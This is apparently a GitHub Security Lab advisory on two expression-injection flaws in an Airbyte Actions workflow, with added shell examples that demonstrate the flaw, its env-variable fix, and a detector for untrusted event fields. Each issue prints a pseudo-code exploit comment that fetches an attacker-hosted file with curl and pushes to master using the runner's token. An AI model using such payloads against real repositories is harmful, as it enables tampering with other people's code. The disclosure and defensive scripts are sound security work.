July 28, 2023

GHSL-2023-086_GHSL-2023-087: Expression injection in a GitHub Actions workflow of Airbyte

GitHub Security Lab

Coordinated Disclosure Timeline

Summary

Potential command injection from the github.event.comment.body context, which may be controlled by an external user (anyone able to comment on an issue or pull request in the repository).


Product

Airbyte repository.

Tested Version

The master branch.


Issue 1: Expression injection in Actions: .github/workflows/commands-for-testing-tool.yml: Line 111 (GHSL-2023-086)

The Actions workflow interpolates uncontrolled user input (the body of an issue or pull request comment) into a run step of commands-for-testing-tool.yml. Because the ${{ }} expression is expanded into the script text before the shell parses it, an attacker can execute arbitrary commands on the Actions runner with the permissions granted to that runner.

- name: Run docker container with params
  run: docker run -v $(pwd)/secrets:/secrets -v $(pwd)/result:/result airbyte/airbyte-e2e-testing-tool:latest ${{ github.event.comment.body }}

Example exploit in a PR comment (pseudo code showing that an attacker could update the repository using the GitHub Actions runner; [malicious file] is a placeholder for an attacker-hosted script):

/run-scenario && curl [malicious file] && git add . && git commit -m "update" && git push origin develop:master


Since the workflow runs with contents: write permissions, the GITHUB_TOKEN available to the runner can push to the source repository, so an injected command chain such as the one above can make malicious modifications to the repository's branches.
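The following is an added example, not code from the Airbyte workflow or from the GHSL advisory. It reproduces in a plain shell why a ${{ github.event.comment.body }} expression inside a run step (Issue 1 and, identically, Issue 2 below) is exploitable, and why the usual remediation of passing the value through an environment variable is not. The comment body, the testing_tool stand-in for the docker run command and the /run-scenario allowlist are all constructed for the demonstration.

```shell
#!/bin/sh
# Added example (not code from the Airbyte workflow or the GHSL advisory).
# Simulates how the Actions runner treats `${{ github.event.comment.body }}`
# inside a `run:` step versus the same value passed via an environment variable.

# Constructed attacker comment: `echo INJECTED` stands in for the
# curl/git chain an attacker would append after the expected /run-scenario.
ATTACKER_COMMENT='/run-scenario && echo INJECTED'

# Stand-in for `docker run ... airbyte/airbyte-e2e-testing-tool:latest ...`:
# prints each argument it received so the shell's word splitting is visible.
testing_tool() {
    for arg in "$@"; do printf 'arg:%s\n' "$arg"; done
}

# Vulnerable form. The runner substitutes the `${{ ... }}` expression into
# the script text BEFORE the shell parses it, so metacharacters in the comment
# (&&, ;, |, $(...), backticks) are interpreted as shell syntax.
run_unsafe() {
    script="testing_tool $1"   # what `run: ... ${{ github.event.comment.body }}` becomes
    eval "$script"
}

# Hardened form. The expression is evaluated into an environment variable
# (in the workflow: env: COMMENT_BODY: ${{ github.event.comment.body }}) and
# the script references "$COMMENT_BODY". The shell parses the fixed script
# first and expands the variable afterwards, so the comment is data, not syntax.
run_safe() {
    COMMENT_BODY=$1
    export COMMENT_BODY
    eval 'testing_tool "$COMMENT_BODY"'   # the script text never changes
}

# Defence in depth: the tool only expects `/run-scenario [args]`, so reject
# anything outside a conservative character allowlist before passing it on.
# The exact allowlist is an assumption made for this demo.
is_allowed_command() {
    case $1 in
        /run-scenario) return 0 ;;
        "/run-scenario "*)
            case "${1#/run-scenario }" in
                *[!A-Za-z0-9_./\ -]*) return 1 ;;
                *) return 0 ;;
            esac ;;
        *) return 1 ;;
    esac
}

demo_unsafe() { run_unsafe "$ATTACKER_COMMENT"; }
demo_safe()   { run_safe "$ATTACKER_COMMENT"; }

echo '--- vulnerable: run_unsafe ---'; demo_unsafe
echo '--- hardened: run_safe ---';    demo_safe
```

In the vulnerable form the stand-in tool receives only /run-scenario and the injected echo runs as a separate command; in the hardened form the whole comment arrives as one argument. The corresponding workflow change is to move the expression into the step's env: block and reference the variable (quoted) in run:; if the tool genuinely needs the comment split into arguments, validate it first, as is_allowed_command does, and reduce the job's permissions to what the scenario actually needs rather than contents: write.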


A CodeQL query that detects this pattern (expression injection in Actions workflows) is linked from the original advisory.
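As an added quick check that is not the GHSL CodeQL query and not Airbyte code, the script below reports ${{ }} expressions that reference attacker-controlled event fields inside run: steps, including block-scalar run: | bodies, while ignoring the same expressions under env:, which is the recommended remediation. The sample workflow and the list of untrusted fields are constructed for the demonstration and the list is illustrative rather than exhaustive.

```shell
#!/bin/sh
# Added example (not the GHSL CodeQL query and not Airbyte code): a small
# awk-based check for untrusted event contexts used inside `run:` steps.

# Constructed workflow: two vulnerable run steps (one single-line, one block
# scalar) and one hardened step that moves the expression into env:.
SAMPLE_WORKFLOW='name: demo
on: issue_comment
jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - name: vulnerable single-line run
        run: ./tool ${{ github.event.comment.body }}
      - name: vulnerable block-scalar run
        run: |
          echo "starting"
          ./tool ${{ github.event.issue.title }}
      - name: hardened (expression moved into env)
        env:
          BODY: ${{ github.event.comment.body }}
        run: ./tool "$BODY"
'

# Event fields an external user controls on issue_comment, issues,
# pull_request_target and similar triggers. Illustrative, not exhaustive.
UNTRUSTED='github[.]event[.](comment[.]body|issue[.](title|body)|pull_request[.](title|body)|pull_request[.]head[.](ref|label)|review[.]body|review_comment[.]body)|github[.]head_ref'

# Reads workflow YAML on stdin; prints "<line>: <text>" for each suspicious line.
find_run_injections() {
    awk -v pat="$UNTRUSTED" '
        function indent(s) { match(s, /^ */); return RLENGTH }
        {
            if ($0 ~ /^ *(- *)?run:/) {              # start of a run: step
                in_run = 1; run_indent = indent($0); check = 1
            } else if (in_run && $0 !~ /^ *$/ && indent($0) <= run_indent) {
                in_run = 0; check = 0                # dedented: block scalar ended
            } else {
                check = in_run                       # continuation line of run: |
            }
            if (check && $0 ~ /[$][{][{]/ && $0 ~ pat) print NR ": " $0
        }'
}

# Line numbers of the hits in the sample workflow, one per line.
sample_hit_lines() {
    printf '%s' "$SAMPLE_WORKFLOW" | find_run_injections | cut -d: -f1
}

printf '%s' "$SAMPLE_WORKFLOW" | find_run_injections
```

Run it against real workflows with `find .github/workflows -name '*.yml' -exec sh -c 'find_run_injections < "$1"' _ {} \;` after sourcing the script. It is a line-oriented heuristic: it does not follow expressions that reach a step through intermediate outputs or reusable workflow inputs, which is where the CodeQL query's data-flow tracking adds value.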

Issue 2: Expression injection in Actions: .github/workflows/commands-for-testing-tool.yml: Line 55 (GHSL-2023-087)

A second run step in the same workflow file, commands-for-testing-tool.yml, interpolates the same uncontrolled user input (the body of an issue or pull request comment) into a shell command. As in Issue 1, the expression is expanded into the script before the shell parses it, so an attacker can execute arbitrary commands on the Actions runner with the permissions granted to that runner.

- name: Run docker container with params
  run: docker run -v $(pwd)/secrets:/secrets -v $(pwd)/result:/result airbyte/airbyte-e2e-testing-tool:latest ${{ github.event.comment.body }}

Example exploit in a PR comment (pseudo code showing that an attacker could update the repository using the GitHub Actions runner; [malicious file] is a placeholder for an attacker-hosted script):

/run-scenario && curl [malicious file] && git add . && git commit -m "update" && git push origin develop:master


Since the workflow runs with contents: write permissions, the GITHUB_TOKEN available to the runner can push to the source repository, so this second injection point allows the same malicious modifications of the repository as Issue 1.


These issues were discovered and reported by GitHub employees @leftrightleft (Dan Shanahan) and @ngonz (Nick Gonzalez).


You can contact the GHSL team at, please include a reference to GHSL-2023-086 or GHSL-2023-087 in any communication regarding these issues.